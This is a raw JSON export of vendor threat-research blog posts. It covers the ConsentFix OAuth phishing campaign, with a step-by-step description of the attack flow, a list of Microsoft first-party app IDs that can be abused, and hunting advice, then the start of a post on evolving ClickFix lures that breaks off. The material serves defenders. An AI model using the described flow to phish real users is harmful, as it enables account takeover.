",[],{},{"nodeType":1294,"data":1461,"content":1462},{},[1463,1467,1476,1480,1489,1493,1502,1506,1515],{"nodeType":1293,"value":1464,"marks":1465,"data":1466},"OAuth abuse attacks are not new. Techniques like ",[],{},{"nodeType":1329,"data":1468,"content":1470},{"uri":1469},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/consent_phishing/description.md",[1471],{"nodeType":1293,"value":1472,"marks":1473,"data":1475},"consent phishing",[1474],{"type":1337},{},{"nodeType":1293,"value":1477,"marks":1478,"data":1479}," and ",[],{},{"nodeType":1329,"data":1481,"content":1483},{"uri":1482},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/device_code_phishing/description.md",[1484],{"nodeType":1293,"value":1485,"marks":1486,"data":1488},"device code phishing",[1487],{"type":1337},{},{"nodeType":1293,"value":1490,"marks":1491,"data":1492}," have been around for some time. However, these mainly focus on connecting your primary workspace account (e.g. Microsoft, Google, etc.) to a fraudulent, attacker-controlled application. But this is becoming increasingly difficult in core enterprise cloud environments like Azure due to ",[],{},{"nodeType":1329,"data":1494,"content":1496},{"uri":1495},"https://learn.microsoft.com/en-us/microsoft-365/admin/misc/user-consent?view=o365-worldwide",[1497],{"nodeType":1293,"value":1498,"marks":1499,"data":1501},"stricter default configs",[1500],{"type":1337},{},{"nodeType":1293,"value":1503,"marks":1504,"data":1505},". 
That said, device code phishing still featured prominently in the recent ",[],{},{"nodeType":1329,"data":1507,"content":1509},{"uri":1508},"https://pushsecurity.com/blog/scattered-lapsus-hunters/",[1510],{"nodeType":1293,"value":1511,"marks":1512,"data":1514},"high-profile Salesforce attacks in 2025",[1513],{"type":1337},{},{"nodeType":1293,"value":1516,"marks":1517,"data":1518},".",[],{},{"nodeType":1520,"data":1521,"content":1522},{},[1523],{"nodeType":1293,"value":1524,"marks":1525,"data":1527},"What makes ConsentFix so dangerous?",[1526],{"type":1444},{},{"nodeType":1294,"data":1529,"content":1530},{},[1531],{"nodeType":1293,"value":1532,"marks":1533,"data":1534},"Unlike typical OAuth attacks, the novel ConsentFix approach enabled the attacker to target different types of application to what they usually go after — with big implications for detection and response. In this case, the attacker:",[],{},{"nodeType":1536,"data":1537,"content":1538},"unordered-list",{},[1539,1550],{"nodeType":1540,"data":1541,"content":1542},"list-item",{},[1543],{"nodeType":1294,"data":1544,"content":1545},{},[1546],{"nodeType":1293,"value":1547,"marks":1548,"data":1549},"Specifically targeted first-party Microsoft apps that cannot be restricted in the same way as third-party applications, and are pre-consented in every tenant (meaning users can authenticate to them without admin approval). 
",[],{},{"nodeType":1540,"data":1551,"content":1552},{},[1553],{"nodeType":1294,"data":1554,"content":1555},{},[1556],{"nodeType":1293,"value":1557,"marks":1558,"data":1559},"Leveraged legacy scopes that are outside the scope of default logging to evade detection, and targeted scopes with known Conditional Access policy exclusions.",[],{},{"nodeType":1294,"data":1561,"content":1562},{},[1563],{"nodeType":1293,"value":1564,"marks":1565,"data":1566},"This means that default controls you’d expect to block malicious OAuth grants don’t apply, you may not have logging enabled to detect it if it did happen to you, and to top it off, conditional access policy exclusions mean that many organizations’ expected controls don’t work as intended in this case. ",[],{},{"nodeType":1433,"data":1568,"content":1569},{},[],{"nodeType":1437,"data":1571,"content":1572},{},[1573],{"nodeType":1293,"value":1574,"marks":1575,"data":1577},"ConsentFix campaign recap",[1576],{"type":1444},{},{"nodeType":1294,"data":1579,"content":1580},{},[1581],{"nodeType":1293,"value":1582,"marks":1583,"data":1584},"Let’s quickly recap how the ConsentFix campaign was implemented. ",[],{},{"nodeType":1294,"data":1586,"content":1587},{},[1588],{"nodeType":1293,"value":1589,"marks":1590,"data":1591},"The victim is served a page which requires that they verify that they are human by pasting a URL into the phishing page.",[],{},{"nodeType":1294,"data":1593,"content":1594},{},[1595],{"nodeType":1293,"value":1596,"marks":1597,"data":1598},"Clicking the “Sign In” button opens a legitimate Microsoft login page. If the user is already logged in (which they likely are if working in their normal browser) their account information is already pre-populated and they won’t need to authenticate again. 
",[],{},{"nodeType":1294,"data":1600,"content":1601},{},[1602],{"nodeType":1293,"value":1603,"marks":1604,"data":1605},"Selecting their account redirects them to a localhost URL containing an OAuth authorization code — this is what they then paste into the original phishing page to complete the attack. ",[],{},{"nodeType":1294,"data":1607,"content":1608},{},[1609],{"nodeType":1293,"value":1610,"marks":1611,"data":1612},"Once the attacker gets the URL, they can exchange it for an access token or refresh token for the particular application being targeted — in this case, Azure CLI.",[],{},{"nodeType":1294,"data":1614,"content":1615},{},[1616],{"nodeType":1293,"value":1617,"marks":1618,"data":1619},"The TL;DR is that the attacker is manually completing an authorization flow that happens when a user logs into Azure CLI — a command-line client that provides you with the ability to easily manage your Azure AD / Entra ID environment. Except in this case, they’re taking the victim’s information to log in on the attacker’s device instead. ",[],{},{"nodeType":1351,"data":1621,"content":1625},{"target":1622},{"sys":1623},{"id":1624,"type":1356,"linkType":1357},"1eZOs7hXi9FzCE92QEP6xh",[],{"nodeType":1520,"data":1627,"content":1628},{},[1629],{"nodeType":1293,"value":1630,"marks":1631,"data":1633},"Latest campaign details",[1632],{"type":1444},{},{"nodeType":1294,"data":1635,"content":1636},{},[1637],{"nodeType":1293,"value":1638,"marks":1639,"data":1640},"Since we shared our blog post, we’ve had a number of additional details come to light about the campaign, which we’ve continued to track. ",[],{},{"nodeType":1294,"data":1642,"content":1643},{},[1644,1648,1656],{"nodeType":1293,"value":1645,"marks":1646,"data":1647},"It appears to be linked to Russian state-affiliated APT29, as corroborated by threat researchers we’ve been collaborating with. 
This is consistent with the ",[],{},{"nodeType":1329,"data":1649,"content":1650},{"uri":1331},[1651],{"nodeType":1293,"value":1652,"marks":1653,"data":1655},"stealthy tactics we observed",[1654],{"type":1337},{},{"nodeType":1293,"value":1657,"marks":1658,"data":1659},", which go far beyond the run-of-the-mill detection evasion techniques we see used in criminal phishing campaigns. ",[],{},{"nodeType":1294,"data":1661,"content":1662},{},[1663,1667,1676],{"nodeType":1293,"value":1664,"marks":1665,"data":1666},"It shares many similarities with, and appears to be an evolution of, ",[],{},{"nodeType":1329,"data":1668,"content":1670},{"uri":1669},"https://www.volexity.com/blog/2025/12/04/dangerous-invitations-russian-threat-actor-spoofs-european-security-events-in-targeted-phishing-attacks/",[1671],{"nodeType":1293,"value":1672,"marks":1673,"data":1675},"this Russia-affiliated campaign identified by Volexity",[1674],{"type":1337},{},{"nodeType":1293,"value":1677,"marks":1678,"data":1679}," that featured a manual version of the attack — where the victim was socially engineered via email into opening the Microsoft URL, copying the localhost response, and sending it back to the attacker via email. ",[],{},{"nodeType":1433,"data":1681,"content":1682},{},[],{"nodeType":1437,"data":1684,"content":1685},{},[1686],{"nodeType":1293,"value":1687,"marks":1688,"data":1690},"Top contributions from the community",[1689],{"type":1444},{},{"nodeType":1294,"data":1692,"content":1693},{},[1694],{"nodeType":1293,"value":1695,"marks":1696,"data":1697},"As we mentioned earlier, the community response to ConsentFix has been incredible. ",[],{},{"nodeType":1294,"data":1699,"content":1700},{},[1701],{"nodeType":1293,"value":1702,"marks":1703,"data":1704},"As ever, you get a lot of vendors covering the attack technique with “install our product” as the recommendation. 
This is to be expected, but it’s misleading when some of these vendors are pushing EDR products that would have absolutely no way of detecting or blocking the attack. ",[],{},{"nodeType":1294,"data":1706,"content":1707},{},[1708],{"nodeType":1293,"value":1709,"marks":1710,"data":1711},"But cutting through the marketing, a lot of really great resources and recommendations were shared. ",[],{},{"nodeType":1520,"data":1713,"content":1714},{},[1715],{"nodeType":1293,"value":1716,"marks":1717,"data":1719},"V2.0 released by John Hammond",[1718],{"type":1444},{},{"nodeType":1294,"data":1721,"content":1722},{},[1723,1727,1735],{"nodeType":1293,"value":1724,"marks":1725,"data":1726},"Within days, John Hammond ",[],{},{"nodeType":1329,"data":1728,"content":1729},{"uri":1368},[1730],{"nodeType":1293,"value":1731,"marks":1732,"data":1734},"posted about ConsentFix on his Youtube channel",[1733],{"type":1337},{},{"nodeType":1293,"value":1736,"marks":1737,"data":1738},", where he showed off a slick improvement on the ConsentFix implementation used by attackers. In his version, the URL containing the Microsoft authorization code was generated in a pop-up browser window that could simply be drag-and-dropped into the phishing page. ",[],{},{"nodeType":1294,"data":1740,"content":1741},{},[1742],{"nodeType":1293,"value":1743,"marks":1744,"data":1745},"This implementation is way smoother, making it much more likely that a victim would fall for it. 
And this took a matter of days… ",[],{},{"nodeType":1351,"data":1747,"content":1751},{"target":1748},{"sys":1749},{"id":1750,"type":1356,"linkType":1357},"59tfJDRhGThKD48Wjg7uY2",[],{"nodeType":1520,"data":1753,"content":1754},{},[1755],{"nodeType":1293,"value":1756,"marks":1757,"data":1759},"Additional vulnerable first-party apps identified",[1758],{"type":1444},{},{"nodeType":1294,"data":1761,"content":1762},{},[1763,1767,1776],{"nodeType":1293,"value":1764,"marks":1765,"data":1766},"Fabian Bader and Dirk-jan Mollema from Glueck Kanja have ",[],{},{"nodeType":1329,"data":1768,"content":1770},{"uri":1769},"https://entrascopes.com/?bypass=true&authcodeFix=true",[1771],{"nodeType":1293,"value":1772,"marks":1773,"data":1775},"shared a great resource",[1774],{"type":1337},{},{"nodeType":1293,"value":1777,"marks":1778,"data":1779}," on wider first-party apps that are vulnerable to ConsentFix. ",[],{},{"nodeType":1294,"data":1781,"content":1782},{},[1783,1787,1796],{"nodeType":1293,"value":1784,"marks":1785,"data":1786},"In total, there are 11 apps vulnerable to ConsentFix that also have known ",[],{},{"nodeType":1329,"data":1788,"content":1790},{"uri":1789},"https://cloudbrothers.info/conditional-access-bypasses/#documented-bypasses",[1791],{"nodeType":1293,"value":1792,"marks":1793,"data":1795},"Conditional Access exclusions",[1794],{"type":1337},{},{"nodeType":1293,"value":1797,"marks":1798,"data":1799}," (either for the app generally, or when specific scopes are requested for the app):",[],{},{"nodeType":1536,"data":1801,"content":1802},{},[1803,1813,1823,1833,1843,1853,1863,1873,1883,1893,1903],{"nodeType":1540,"data":1804,"content":1805},{},[1806],{"nodeType":1294,"data":1807,"content":1808},{},[1809],{"nodeType":1293,"value":1810,"marks":1811,"data":1812},"Microsoft Azure CLI: 
04b07795-8ddb-461a-bbee-02f9e1bf7b46",[],{},{"nodeType":1540,"data":1814,"content":1815},{},[1816],{"nodeType":1294,"data":1817,"content":1818},{},[1819],{"nodeType":1293,"value":1820,"marks":1821,"data":1822},"Microsoft Azure PowerShell: 1950a258-227b-4e31-a9cf-717495945fc2",[],{},{"nodeType":1540,"data":1824,"content":1825},{},[1826],{"nodeType":1294,"data":1827,"content":1828},{},[1829],{"nodeType":1293,"value":1830,"marks":1831,"data":1832},"Microsoft Teams: 1fec8e78-bce4-4aaf-ab1b-5451cc387264",[],{},{"nodeType":1540,"data":1834,"content":1835},{},[1836],{"nodeType":1294,"data":1837,"content":1838},{},[1839],{"nodeType":1293,"value":1840,"marks":1841,"data":1842},"Microsoft Whiteboard Client: 57336123-6e14-4acc-8dcf-287b6088aa28",[],{},{"nodeType":1540,"data":1844,"content":1845},{},[1846],{"nodeType":1294,"data":1847,"content":1848},{},[1849],{"nodeType":1293,"value":1850,"marks":1851,"data":1852},"Microsoft Flow Mobile PROD-GCCH-CN: 57fcbcfa-7cee-4eb1-8b25-12d2030b4ee0",[],{},{"nodeType":1540,"data":1854,"content":1855},{},[1856],{"nodeType":1294,"data":1857,"content":1858},{},[1859],{"nodeType":1293,"value":1860,"marks":1861,"data":1862},"Enterprise Roaming and Backup: 60c8bde5-3167-4f92-8fdb-059f6176dc0 (as published, this ID is one character short of a full GUID; confirm the complete value against the linked resource before hunting on it)",[],{},{"nodeType":1540,"data":1864,"content":1865},{},[1866],{"nodeType":1294,"data":1867,"content":1868},{},[1869],{"nodeType":1293,"value":1870,"marks":1871,"data":1872},"Visual Studio: 872cd9fa-d31f-45e0-9eab-6e460a02d1f1",[],{},{"nodeType":1540,"data":1874,"content":1875},{},[1876],{"nodeType":1294,"data":1877,"content":1878},{},[1879],{"nodeType":1293,"value":1880,"marks":1881,"data":1882},"Aadrm Admin Powershell: 90f610bf-206d-4950-b61d-37fa6fd1b224",[],{},{"nodeType":1540,"data":1884,"content":1885},{},[1886],{"nodeType":1294,"data":1887,"content":1888},{},[1889],{"nodeType":1293,"value":1890,"marks":1891,"data":1892},"Microsoft SharePoint Online Management Shell: 
9bc3ab49-b65d-410a-85ad-de819febfddc",[],{},{"nodeType":1540,"data":1894,"content":1895},{},[1896],{"nodeType":1294,"data":1897,"content":1898},{},[1899],{"nodeType":1293,"value":1900,"marks":1901,"data":1902},"Microsoft Power Query for Excel: a672d62c-fc7b-4e81-a576-e60dc46e951d",[],{},{"nodeType":1540,"data":1904,"content":1905},{},[1906],{"nodeType":1294,"data":1907,"content":1908},{},[1909],{"nodeType":1293,"value":1910,"marks":1911,"data":1912},"Visual Studio Code: aebc6443-996d-45c2-90f0-388ff96faa56",[],{},{"nodeType":1433,"data":1914,"content":1915},{},[],{"nodeType":1437,"data":1917,"content":1918},{},[1919],{"nodeType":1293,"value":1920,"marks":1921,"data":1923},"Predictions for ConsentFix",[1922],{"type":1444},{},{"nodeType":1294,"data":1925,"content":1926},{},[1927],{"nodeType":1293,"value":1928,"marks":1929,"data":1930},"Based on the speed at which new iterations on the ConsentFix technique were shared by security researchers, and the breadth of apps and possible scopes that can be leveraged, both red teams and criminals will inevitably adopt ConsentFix into their arsenal of TTPs in the near future. It is likely that new ConsentFix variants will emerge imminently (if not already in circulation). ",[],{},{"nodeType":1294,"data":1932,"content":1933},{},[1934],{"nodeType":1293,"value":1935,"marks":1936,"data":1937},"All security teams responsible for protecting Microsoft environments should ensure that monitoring controls and mitigations are put in place as a matter of high priority. 
",[],{},{"nodeType":1433,"data":1939,"content":1940},{},[],{"nodeType":1437,"data":1942,"content":1943},{},[1944],{"nodeType":1293,"value":1945,"marks":1946,"data":1948},"Updated recommendations for security teams",[1947],{"type":1444},{},{"nodeType":1294,"data":1950,"content":1951},{},[1952],{"nodeType":1293,"value":1953,"marks":1954,"data":1955},"As an entirely browser-native attack technique, many traditional security tools and data sources are of limited use when it comes to detecting or pre-emptively blocking this attack. At the same time, the attack exploits default Microsoft security configs to evade both prevention and detection controls.",[],{},{"nodeType":1294,"data":1957,"content":1958},{},[1959],{"nodeType":1293,"value":1960,"marks":1961,"data":1962},"To be able to tackle modern attacks like ConsentFix that occur entirely within the browser context, it is vital that organizations look to monitor the browser as a detection surface, hunt for signs of malicious activity, and block attacks in real-time — in the same way that you would expect EDR to work for endpoint attacks. 
",[],{},{"nodeType":1294,"data":1964,"content":1965},{},[1966],{"nodeType":1293,"value":1967,"marks":1968,"data":1969},"For organizations relying on Microsoft logging as the sole line of defense against this attack, there are some new recommendations to add to the list thanks to the community response: ",[],{},{"nodeType":1536,"data":1971,"content":1972},{},[1973,1996,2006,2027],{"nodeType":1540,"data":1974,"content":1975},{},[1976],{"nodeType":1294,"data":1977,"content":1978},{},[1979,1983,1992],{"nodeType":1293,"value":1980,"marks":1981,"data":1982},"Ensure that logging for the deprecated ",[],{},{"nodeType":1329,"data":1984,"content":1986},{"uri":1985},"https://learn.microsoft.com/en-us/azure/azure-monitor/reference/tables/aadgraphactivitylogs",[1987],{"nodeType":1293,"value":1988,"marks":1989,"data":1991},"AADGraphActivityLogs",[1990],{"type":1337},{},{"nodeType":1293,"value":1993,"marks":1994,"data":1995}," is enabled.",[],{},{"nodeType":1540,"data":1997,"content":1998},{},[1999],{"nodeType":1294,"data":2000,"content":2001},{},[2002],{"nodeType":1293,"value":2003,"marks":2004,"data":2005},"Hunt in logs for the Application IDs highlighted above, along with the Resource IDs for Windows Azure Active Directory (00000002-0000-0000-c000-000000000000) and Microsoft Intune Checkin (26a4ae64-5862-427f-a9b0-044e62572a4f)",[],{},{"nodeType":1540,"data":2007,"content":2008},{},[2009],{"nodeType":1294,"data":2010,"content":2011},{},[2012,2015,2023],{"nodeType":1293,"value":37,"marks":2013,"data":2014},[],{},{"nodeType":1329,"data":2016,"content":2017},{"uri":1407},[2018],{"nodeType":1293,"value":2019,"marks":2020,"data":2022},"Create Service Principals for each of the vulnerable apps and restrict the users that are authorized to access them",[2021],{"type":1337},{},{"nodeType":1293,"value":2024,"marks":2025,"data":2026}," to reduce the attack surface of users that can be phished with this 
method.",[],{},{"nodeType":1540,"data":2028,"content":2029},{},[2030],{"nodeType":1294,"data":2031,"content":2032},{},[2033],{"nodeType":1293,"value":2034,"marks":2035,"data":2036},"Block access to CLI tools via Conditional Access policy and issue exclusions for authorized users/groups. ",[],{},{"nodeType":1294,"data":2038,"content":2039},{},[2040,2044,2053,2057,2064],{"nodeType":1293,"value":2041,"marks":2042,"data":2043},"Additional resources that may be of use include community-created ",[],{},{"nodeType":1329,"data":2045,"content":2047},{"uri":2046},"https://github.com/elastic/detection-rules/pull/5485",[2048],{"nodeType":1293,"value":2049,"marks":2050,"data":2052},"Elastic detection rules",[2051],{"type":1337},{},{"nodeType":1293,"value":2054,"marks":2055,"data":2056}," for ConsentFix and further mitigation and hunting guidance from ",[],{},{"nodeType":1329,"data":2058,"content":2059},{"uri":1394},[2060],{"nodeType":1293,"value":1397,"marks":2061,"data":2063},[2062],{"type":1337},{},{"nodeType":1293,"value":2065,"marks":2066,"data":2067},". ",[],{},{"nodeType":1433,"data":2069,"content":2070},{},[],{"nodeType":1437,"data":2072,"content":2073},{},[2074],{"nodeType":1293,"value":2075,"marks":2076,"data":2078},"Learn more about Push Security",[2077],{"type":1444},{},{"nodeType":1294,"data":2080,"content":2081},{},[2082],{"nodeType":1293,"value":2083,"marks":2084,"data":2085},"Even though this was a brand new technique, Push intercepted this attack and shut it down before customers could interact with it. ",[],{},{"nodeType":1294,"data":2087,"content":2088},{},[2089],{"nodeType":1293,"value":2090,"marks":2091,"data":2092},"Push tackles browser-based attacks using behavioral threat detection controls, powered by deep browser telemetry, to provide broad detection and blocking capabilities against attacks happening in the browser. 
This means analyzing the end-to-end process of a webpage loading/running in the browser, and how the user interacts with the page, to spot universal indicators of bad activity. ",[],{},{"nodeType":1294,"data":2094,"content":2095},{},[2096],{"nodeType":1293,"value":2097,"marks":2098,"data":2099},"This is the only reliable way to detect malicious websites in a world where IoC-based detections are trivial for attackers to get around. Rather than playing known-bad whac-a-mole, Push detects and blocks even zero-day browser threats in real time.",[],{},{"nodeType":1294,"data":2101,"content":2102},{},[2103],{"nodeType":1293,"value":2104,"marks":2105,"data":2106},"Push stops browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, ClickFix, ConsentFix, and session hijacking. You don’t need to wait until it all goes wrong either — you can also use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your identity attack surface.",[],{},{"nodeType":1294,"data":2108,"content":2109},{},[2110,2114,2123,2127,2136],{"nodeType":1293,"value":2111,"marks":2112,"data":2113},"To learn more about Push, ",[],{},{"nodeType":1329,"data":2115,"content":2117},{"uri":2116},"https://pushsecurity.com/resources/product-brochure",[2118],{"nodeType":1293,"value":2119,"marks":2120,"data":2122},"check out our latest product overview",[2121],{"type":1337},{},{"nodeType":1293,"value":2124,"marks":2125,"data":2126}," or ",[],{},{"nodeType":1329,"data":2128,"content":2130},{"uri":2129},"https://pushsecurity.com/demo",[2131],{"nodeType":1293,"value":2132,"marks":2133,"data":2135},"book some time with one of our team for a live 
demo",[2134],{"type":1337},{},{"nodeType":1293,"value":1516,"marks":2137,"data":2138},[],{},{"nodeType":1351,"data":2140,"content":2144},{"target":2141},{"sys":2142},{"id":2143,"type":1356,"linkType":1357},"4D7zpYAc1tTEAmn2hpkWPe",[],{"nodeType":1294,"data":2146,"content":2147},{},[2148],{"nodeType":1293,"value":37,"marks":2149,"data":2150},[],{},"ConsentFix debrief: latest community insights, recommendations, and predictions","New insights on the ConsentFix campaign stopped by Push.","2026-01-14T00:00:00.000Z","consentfix-debrief",{"items":2156},[2157,2159],{"sys":2158,"name":1310},{"id":1309},{"sys":2160,"name":1306},{"id":1305},{"items":2162},[2163],{"fullName":2164,"firstName":2165,"jobTitle":2166,"profilePicture":2167},"Dan Green","Dan","Threat Research",{"url":2168},"https://images.ctfassets.net/y1cdw1ablpvd/7jik1VhFgA3kgzXBXTm2Vw/fcd8c171da644903d0827eafcfbcaad0/Dan_Headshot_2025.png",{"__typename":1314,"sys":2170,"content":2172,"title":2751,"synopsis":2752,"hashTags":118,"publishedDate":2753,"slug":2754,"tagsCollection":2755,"authorsCollection":2761},{"id":2171},"7rVNBW6rYXnXMpI0JEwzgR",{"json":2173},{"nodeType":1295,"data":2174,"content":2175},{},[2176,2183,2190,2202,2208,2215,2218,2226,2233,2239,2255,2262,2285,2292,2298,2301,2309,2342,2348,2367,2373,2393,2400,2406,2409,2417,2424,2444,2451,2471,2478,2484,2487,2495,2502,2535,2542,2549,2595,2614,2625,2632,2635,2643,2663,2670,2677,2683,2686,2694,2714,2740,2745],{"nodeType":1294,"data":2177,"content":2178},{},[2179],{"nodeType":1293,"value":2180,"marks":2181,"data":2182},"ClickFix attacks have skyrocketed in the last year. 
This social engineering attack has established itself as a key part of the modern attacker’s toolkit, tricking victims into running malicious code on their device.",[],{},{"nodeType":1294,"data":2184,"content":2185},{},[2186],{"nodeType":1293,"value":2187,"marks":2188,"data":2189},"As we showcased in our last webinar and at our threat briefing in London earlier this month, ClickFix is evolving fast, in terms of the web pages themselves, the delivery mechanisms by which they are sent to victims, and the nature of the payload and its execution.",[],{},{"nodeType":1294,"data":2191,"content":2192},{},[2193,2197],{"nodeType":1293,"value":2194,"marks":2195,"data":2196},"One particular example stood out to us in our research. ",[],{},{"nodeType":1293,"value":2198,"marks":2199,"data":2201},"So, is this the most advanced ClickFix you’ve seen?",[2200],{"type":1444},{},{"nodeType":1351,"data":2203,"content":2207},{"target":2204},{"sys":2205},{"id":2206,"type":1356,"linkType":1357},"ID7VKJNOZk729P5zBOBjZ",[],{"nodeType":1294,"data":2209,"content":2210},{},[2211],{"nodeType":1293,"value":2212,"marks":2213,"data":2214},"Let’s break it down further.",[],{},{"nodeType":1433,"data":2216,"content":2217},{},[],{"nodeType":1437,"data":2219,"content":2220},{},[2221],{"nodeType":1293,"value":2222,"marks":2223,"data":2225},"How ClickFix pages are evolving",[2224],{"type":1444},{},{"nodeType":1294,"data":2227,"content":2228},{},[2229],{"nodeType":1293,"value":2230,"marks":2231,"data":2232},"The CloudFlare-based lure is a great example of how ClickFix pages themselves are evolving — and becoming increasingly convincing to users. 
",[],{},{"nodeType":1351,"data":2234,"content":2238},{"target":2235},{"sys":2236},{"id":2237,"type":1356,"linkType":1357},"4wJOgtofImjbsekyXMc5Ec",[],{"nodeType":1294,"data":2240,"content":2241},{},[2242,2246,2251],{"nodeType":1293,"value":2243,"marks":2244,"data":2245},"This is an incredibly slick example — ",[],{},{"nodeType":1293,"value":2247,"marks":2248,"data":2250},"it almost looks like Cloudflare shipped a new kind of bot check service. ",[2249],{"type":1444},{},{"nodeType":1293,"value":2252,"marks":2253,"data":2254},"The embedded video, countdown timer, and counter for “users verified in the last hour” all serve to increase the sense of authenticity, and put extra pressure on the victim to complete the check. ",[],{},{"nodeType":1294,"data":2256,"content":2257},{},[2258],{"nodeType":1293,"value":2259,"marks":2260,"data":2261},"There are a couple of extra things happening under the hood here, too:",[],{},{"nodeType":1536,"data":2263,"content":2264},{},[2265,2275],{"nodeType":1540,"data":2266,"content":2267},{},[2268],{"nodeType":1294,"data":2269,"content":2270},{},[2271],{"nodeType":1293,"value":2272,"marks":2273,"data":2274},"The page is adapting to the device that you’re visiting from, serving up instructions specific to the user’s Mac (increasingly common as ClickFix expands to support different Operating Systems).",[],{},{"nodeType":1540,"data":2276,"content":2277},{},[2278],{"nodeType":1294,"data":2279,"content":2280},{},[2281],{"nodeType":1293,"value":2282,"marks":2283,"data":2284},"The page is automatically copying the malicious code to the user’s clipboard via JavaScript (which we see in 9/10 cases).",[],{},{"nodeType":1294,"data":2286,"content":2287},{},[2288],{"nodeType":1293,"value":2289,"marks":2290,"data":2291},"For the past decade or more, user awareness has focused on stopping users from clicking links in suspicious emails, downloading risky files, and entering their username and password into random websites. 
It hasn’t focused on opening up a program and running a command — so it’s no surprise that this kind of highly convincing page is so effective at duping victims into following the instructions. ",[],{},{"nodeType":1351,"data":2293,"content":2297},{"target":2294},{"sys":2295},{"id":2296,"type":1356,"linkType":1357},"LiVIyGxdAaUXUfvKjD6ON",[],{"nodeType":1433,"data":2299,"content":2300},{},[],{"nodeType":1437,"data":2302,"content":2303},{},[2304],{"nodeType":1293,"value":2305,"marks":2306,"data":2308},"How ClickFix delivery methods are evolving",[2307],{"type":1444},{},{"nodeType":1294,"data":2310,"content":2311},{},[2312,2316,2325,2329,2338],{"nodeType":1293,"value":2313,"marks":2314,"data":2315},"There’s also the fact that this page wasn’t accessed via email. The top delivery vector for ClickFix attacks that we’ve observed is, in fact, Google Search — in the form of ",[],{},{"nodeType":1329,"data":2317,"content":2319},{"uri":2318},"https://phishing-techniques.pushsecurity.com/techniques/malvertising/",[2320],{"nodeType":1293,"value":2321,"marks":2322,"data":2324},"poisoned search results and malicious advertising (malvertising)",[2323],{"type":1337},{},{"nodeType":1293,"value":2326,"marks":2327,"data":2328},". Attackers are either taking over legitimate sites (there’s a ",[],{},{"nodeType":1329,"data":2330,"content":2332},{"uri":2331},"https://www.bleepingcomputer.com/news/security/hackers-launch-mass-attacks-exploiting-outdated-wordpress-plugins/",[2333],{"nodeType":1293,"value":2334,"marks":2335,"data":2337},"steady supply of website hosting and CMS vulnerabilities",[2336],{"type":1337},{},{"nodeType":1293,"value":2339,"marks":2340,"data":2341}," to take advantage of) or simply vibe-coding their own sites and optimizing them for various search terms. 
",[],{},{"nodeType":1351,"data":2343,"content":2347},{"target":2344},{"sys":2345},{"id":2346,"type":1356,"linkType":1357},"6N9EmH6AaN6Hr4xk6ozATR",[],{"nodeType":1294,"data":2349,"content":2350},{},[2351,2355,2364],{"nodeType":1293,"value":2352,"marks":2353,"data":2354},"And because most anti-phishing controls are implemented via email, by using ",[],{},{"nodeType":1329,"data":2356,"content":2358},{"uri":2357},"https://pushsecurity.com/blog/why-attackers-are-moving-beyond-email-based-phishing?utm_source=thehackernews&utm_medium=sponsored-content&utm_term=article",[2359],{"nodeType":1293,"value":2360,"marks":2361,"data":2363},"non-email delivery vectors, an entire layer of detection opportunity is cut out",[2362],{"type":1337},{},{"nodeType":1293,"value":2065,"marks":2365,"data":2366},[],{},{"nodeType":1351,"data":2368,"content":2372},{"target":2369},{"sys":2370},{"id":2371,"type":1356,"linkType":1357},"1CWsZlLFX9TS53J1uamOG8",[],{"nodeType":1294,"data":2374,"content":2375},{},[2376,2380,2389],{"nodeType":1293,"value":2377,"marks":2378,"data":2379},"But even when they are sent via email, ClickFix pages, like other modern phishing sites, are using a range of ",[],{},{"nodeType":1329,"data":2381,"content":2383},{"uri":2382},"https://pushsecurity.com/blog/phishing-detection-evasion-launch?utm_source=thehackernews&utm_medium=sponsored-content&utm_term=article",[2384],{"nodeType":1293,"value":2385,"marks":2386,"data":2388},"detection evasion techniques",[2387],{"type":1337},{},{"nodeType":1293,"value":2390,"marks":2391,"data":2392}," that prevent them being flagged by security tools — from email scanners, to web-crawling security tools, to web proxies analyzing network traffic. Detection evasion mainly involves camouflaging and rotating domains to stay ahead of known-bad detections (i.e. blocklists), using bot protection to prevent analysis, and heavily obfuscating page content to stop detection signatures firing. 
",[],{},{"nodeType":1294,"data":2394,"content":2395},{},[2396],{"nodeType":1293,"value":2397,"marks":2398,"data":2399},"Finally, because the code is copied inside the browser sandbox, typical security tools are unable to observe and flag this action as potentially malicious. This means that the last — and only — opportunity for organizations to stop ClickFix is on the endpoint, after the user has attempted to run the malicious code.",[],{},{"nodeType":1351,"data":2401,"content":2405},{"target":2402},{"sys":2403},{"id":2404,"type":1356,"linkType":1357},"3HiqpIBWWMr5FMi3IBzXcc",[],{"nodeType":1433,"data":2407,"content":2408},{},[],{"nodeType":1437,"data":2410,"content":2411},{},[2412],{"nodeType":1293,"value":2413,"marks":2414,"data":2416},"How ClickFix payloads are evolving",[2415],{"type":1444},{},{"nodeType":1294,"data":2418,"content":2419},{},[2420],{"nodeType":1293,"value":2421,"marks":2422,"data":2423},"It’s not just the ClickFix page and delivery mechanisms that are evolving — the services where code is being run, and the type of payload, are also increasingly varied. 
",[],{},{"nodeType":1294,"data":2425,"content":2426},{},[2427,2431,2440],{"nodeType":1293,"value":2428,"marks":2429,"data":2430},"While the main payloads observed by Push are mshta and PowerShell, ",[],{},{"nodeType":1329,"data":2432,"content":2434},{"uri":2433},"https://mhaggis.github.io/ClickGrab/techniques.html",[2435],{"nodeType":1293,"value":2436,"marks":2437,"data":2439},"attackers are abusing a wide range of LOLBINS",[2438],{"type":1337},{},{"nodeType":1293,"value":2441,"marks":2442,"data":2443}," targeting different services across Operating Systems.",[],{},{"nodeType":1294,"data":2445,"content":2446},{},[2447],{"nodeType":1293,"value":2448,"marks":2449,"data":2450},"While it is possible to disable the Win+R dialog box and limit the applications that can be run from the File Explorer address bar, it is not possible to similarly restrict users from interacting with other legitimate services to run malicious commands. ",[],{},{"nodeType":1294,"data":2452,"content":2453},{},[2454,2458,2467],{"nodeType":1293,"value":2455,"marks":2456,"data":2457},"Another recent example termed ",[],{},{"nodeType":1329,"data":2459,"content":2461},{"uri":2460},"https://expel.com/blog/cache-smuggling-when-a-picture-isnt-a-thousand-words/",[2462],{"nodeType":1293,"value":2463,"marks":2464,"data":2466},"cache smuggling",[2465],{"type":1337},{},{"nodeType":1293,"value":2468,"marks":2469,"data":2470}," was also identified by security researchers. This technique combines a ClickFix approach with JavaScript that caches a malicious file posing as a JPG. This means that the ClickFix command executes locally — effectively getting an entire zip file onto the local system without the PowerShell command needing to make any web 